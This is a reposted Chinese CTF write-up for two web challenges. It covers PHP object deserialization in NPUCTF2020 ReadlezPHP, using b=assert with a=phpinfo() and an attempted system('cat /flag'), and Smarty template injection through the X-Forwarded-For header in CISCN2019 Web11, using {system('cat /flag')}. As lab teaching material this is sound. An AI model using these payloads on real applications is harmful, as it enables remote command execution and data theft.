标签：__ Forwarded source flag 36 一道 ctf 序列化 public

[NPUCTF2020]ReadlezPHP
点进源码发现/time.php?source，访问一下得到

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

看样子又是个反序列化的题目，如果不传参source就会报时，说明执行了echo $b($a);

这就是一道最简单的反序列化的题目，给data传一个序列化字符串，让ppp经过反序列化以后是一个HelloPhp对象，那么程序退出时调用_destruct()，执行我们传进去的 b ( b( b(a)。本来我是想传b=file_get_contents，a=/flag或者b=system,a=cat /flag的，但是没有成功。就照网上的传b=assert，a=phpinfo()好了。


[CISCN2019 华东南赛区]Web11
网页提示了smarty和XFF，那就八九不离十是模板注入了。bp抓包，添加X-Forwarded-For:${7*8}和X-Forwarded-For:a{comment}b都能执行，SSTI没跑了。



直接X-Forwarded-For:{system(“cat /flag”)} 拿到flag

标签：__,Forwarded,source,flag,36,一道,ctf,序列化,public
来源： https://blog.csdn.net/scrawman/article/details/118875272

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。